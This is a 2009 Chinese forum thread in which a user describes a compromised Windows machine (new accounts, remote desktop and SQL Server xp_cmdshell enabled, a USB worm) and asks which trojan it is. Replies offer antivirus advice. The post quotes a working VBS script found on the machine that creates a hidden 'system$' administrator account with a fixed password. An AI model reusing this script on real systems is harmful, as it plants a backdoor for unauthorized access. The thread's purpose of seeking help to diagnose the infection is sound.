首页 新闻 会员 周边 捐助

请问如下症状是感染了什么木马?

0
悬赏园豆:5 [已关闭问题]

在我的机器里添加了多个用户名,还开启了允许远程桌面,然后打开了SQL2005的xp_cmdShell功能.

 

发现C盘下多出一个vbs文件:

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","system$")
od.SetPassword "pagaNINI_01"
od.SetInfo
Set of=GetObject(os&"/system$",user)
oe.add os&"/system$"

 

自己插入U盘后,发现会在U盘下多出一个"重要系统服务..exe"的目录,删除后,刷新就又跑出来了.

请问问.

这个是什么木马?

 

天真的好蓝啊的主页 天真的好蓝啊 | 初学一级 | 园豆:150
提问于:2009-04-29 11:34
< >
分享
其他回答(2)
0

U盘不要双击打开,右键,资源管理器打开,可以阻止木马、病毒自动运行。

然后删除不明文件,你那个.exe应该就是病毒或者木马了,因为目前还没发现哪个文件会叫这个名字。

删不掉就用卡巴或者其他东西删。

lightwalker | 园豆:14 (初学一级) | 2009-04-29 11:37
0

http://www.hackeroo.com/read-htm-tid-6351.html

黑白之间 | 园豆:859 (小虾三级) | 2009-04-29 22:16
0

普通的蠕虫吧,卡吧防这些东西容易,要是中了之后再去杀,未必杀得干净~

风海迷沙 | 园豆:4453 (老鸟四级) | 2009-04-30 12:00
清除回答草稿
   您需要登录以后才能回答,未注册用户请先注册